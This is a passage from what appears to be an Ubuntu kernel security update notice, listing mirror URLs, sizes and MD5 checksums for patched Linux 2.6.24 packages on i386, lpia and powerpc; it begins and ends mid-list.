    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:  2089276 69416120cd161789b598b2b93034db07
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb
      Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb
      Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb
      Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb
      Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb
      Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb
      Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb
      Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb
      Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb
      Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb
      Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb
      Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb
      Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb
      Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb
      Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb
      Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb
      Size/MD5:   707576 d26794effd4e857da1db4d28e9407611
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   163034 9cc84b270528d0fef36320974b415392
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   236710 755a3caeceece8650e46706804c6e072
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   150836 169c287e6bc754d02924a719d34aad29
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   156072 9ff98bc4b62d033785de95858201c353
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    33388 860c1b56a45914246929757c815f5ec4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    92446 6525df043e2a865a6eb646f015140e31
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb
      Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb
      Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb
      Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
      Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0
    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
      Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8
    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb
      Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562
    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
      Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b
    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
      Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   334046 06512921aae848be603af54dc56f72e6
    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d
    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    62718 e53308b729496be4a0e343535769c74e
    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b
    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37
    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59
    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061
    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   105746 034c14e0418581e1b8b56913246e96de
    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92
    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295
    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   704830 ef370acc49192e464ef553984e361d88
    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773
    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   243328 b280fefee27294e988529239616e68fe
    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476
    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c
    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625
    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0
    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6
    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2
    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541
    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   387992 53b23049b6f79a9609349927adec3443
    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51
    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae
    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a
    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
      Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c
    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
      Size/MD5:   657530 98dd4c49966d886237bed19fddb84057
    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
      Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91
    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
      Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879
    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
      Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49
    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
      Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d
    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb
      Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305
    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   266748 d71a805e23acc800f21449d312975e04
    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17
    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66
    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   201688 94056840984e621b385099d261ce2420
    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51
    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152
    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd
    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951
    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e
    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b
    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef
    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   199752 9d4225f0960410c78279f61aa02471da
    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd
    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9
    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09
    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    46836 10f5de3e02406e28d373098a6613860b
    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558
    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41
    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48
    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69
    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db
    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb
    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:     8486 80580934d5e5f6909c396732bedf2055
    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1
    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b
    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc
    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37
    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed
    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814
    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be
    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a
    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf
    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b
    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2
    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
      Size/MD5:   44963